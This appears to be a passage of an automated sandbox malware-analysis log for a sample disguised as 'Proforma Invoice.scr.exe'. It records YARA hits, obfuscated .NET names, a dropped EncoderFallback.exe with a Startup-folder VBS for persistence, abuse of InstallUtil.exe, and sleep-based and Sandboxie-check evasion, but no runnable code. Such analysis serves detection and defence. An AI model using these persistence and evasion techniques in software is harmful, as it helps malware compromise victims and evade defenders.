                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara match | File source: 0.2.Proforma Invoice.scr.exe.6430000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Proforma Invoice.scr.exe.38513e0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Proforma Invoice.scr.exe.3943e00.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2480782000.0000000006430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Code function: 0_2_06DC3E01 push es; ret 0_2_06DC3E07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 3_2_00B70C54 push ebx; retf 3_2_00B70C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 3_2_00B70C45 push ebx; retf 3_2_00B70C52
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe | Code function: 6_2_07383E01 push es; ret 6_2_07383E07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_00F70C53 push ebx; retf 7_2_00F70C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 7_2_00F70C45 push ebx; retf 7_2_00F70C52
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'IG552r4FoQDWp1Lmq4C'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, psDPth7zcdHJ8jQAYFF.csHigh entropy of concatenated method names: 'IL0KcrL9DR', 'jTKKZCXn7N', 'dHFKH6BdOp', 'voOKOSFAxX', 'eHnKQ5YnSO', 'sFRKV3eFd0', 'MjMKyJJrb1', 'bk61Xm6atF', 'pZtK0B8HBt', 'xrRKNi0r14'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, X9GnBCIAa43rtnS11oP.csHigh entropy of concatenated method names: 'NNFIgl5MZs', 'ruuIaUJ3qs', 'ChprMBUUSjPyZQwXTE3', 'BvKpmgU424Mu9ayYcew', 'vKoQqiUjiKNQlGfVqZv', 'sNskefUnEdBjYYXGUFR', 'lF7AGwUGXJSquFwL1p6', 'qUMxv6U6QJq7DMWFlKR', 'W0GkNaUWgJ2ZNfCqKny', 'R2jLcVUBKO4FwDpwaCh'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.csHigh entropy of concatenated method names: 'v6sDJP42Iq7xZxby1UV', 'VrCfJr4qxSvkZThgIjZ', 'VeB77Txuj9', 'jedMFu4t4cC8DG1TgSc', 'vZpePM4CWkZdEhOPx3U', 'lehmaL4m8JQnUwwjUEs', 'hganrV43xqQSaMaMRaF', 'K8u2Pq4r2CduEuUSSBh', 'Ohpmi84dv1bvfD1mr2D', 'nuwyBq4Sh45IefRGByg'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, lx2PSRMF3CQCnUwdnWI.csHigh entropy of concatenated method names: 'OyoMEguRYI', 'ODXM18j5R4', 'jLyMolYu8E', 'D8KM5kniYT', 'hYuMAKH7jc', 'tLwMK9HD31', 'JJUMgcOZ26', 'KHTMaqoItd', 'sciMl33k9D', 'JQxMkdGYmT'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, wMZRowFyUyw4p8mstA6.csHigh entropy of concatenated method names: 't7NFNyQLa5', 'GoQBIXUi0k4evAIGcrI', 'xPQc94URNDLGfeMQ1oi', 'ueUVkPUMEoL7y3mpXPS', 'ztv2bwUbBqfgHdRVltG', 'xG87htUJNYXjmkDcpb0'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, wVWhag7hvjBwj3O1Nm1.csHigh entropy of concatenated method names: 'Iab7wJ7Pg6', 'MNS7TGslvQ', 'EeS7fsowuU', 'uoZ7t3kym4', 'AxN7CWSMcQ', 'bPs7mKtiSC', 'm3P73Aounx', 'mgb7rwOSfg', 'T047dEa0D7', 'foN7SieGVI'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, MY3AT2RNNgI03btKK3V.csHigh entropy of concatenated method names: 'MpeRDiOKB0', 'otWRp7NPrR', 'i9ARY8eqrF', 'wowRhBs4cx', 'o8oReoCAA6', 'ND6Njxh5gHHggDsQ1Hc', 'sEUAk2hAYgJMDGk10Mc', 'Ga0FTIhK6lMr1uPouTY', 'FTEO0Nhgn6m5fL0C7Y6', 'ls7LmmhanUSu5KqlAtE'
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | File created: C:\Users\user\AppData\Roaming\EncoderFallback.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: 4570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory allocated: 4B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeWindow / User API: threadDelayed 2706Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeWindow / User API: threadDelayed 7055Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6535Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3269Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeWindow / User API: threadDelayed 3989Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeWindow / User API: threadDelayed 3991Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8512Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 6424Thread sleep count: 2706 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 6424Thread sleep count: 7055 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3556Thread sleep count: 6535 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3556Thread sleep count: 3269 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597484s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597046s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596936s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596824s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596718s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596317s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596180s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596030s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595898s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595653s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595188s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594616s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594498s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594389s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594171s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -593953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 6368Thread sleep count: 3989 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 6368Thread sleep count: 3991 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99780s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99561s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99451s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99013s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98894s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98424s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98273s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98046s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97827s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97718s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97499s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97171s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96952s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96624s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96296s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96070s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95702s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95588s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95470s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3804Thread sleep count: 1329 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3804Thread sleep count: 8512 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599655s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598531s >= -30000sJump to behavior
